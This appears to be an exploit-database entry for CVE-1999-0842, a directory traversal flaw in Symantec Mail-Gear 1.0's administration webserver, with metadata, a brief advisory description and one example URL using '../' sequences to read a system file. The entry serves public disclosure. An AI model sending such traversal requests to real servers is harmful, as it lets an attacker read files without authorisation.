[] NeoSense

symantec mail-gear 1.0 - Directory Traversal

Author: Ussr Labs
type: remote
platform: multiple
port: 
date_added: 1999-11-29 
date_updated: 2012-07-06 
verified: 1 
codes: CVE-1999-0842;OSVDB-1144 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/827/info

Mail-Gear, a multi-purpose filtering email server, includes a webserver for remote administration and email retrieval. This webserver is vulnerable to the '../' directory traversal attack. By including the string '../' in the URL, remote attackers can gain read access to all files on the filesystem that the server has read access to.


http: //target.host:8003/Display?what=../../../../../autoexec.bat
will display the server's autoexec.bat in a default NT installation.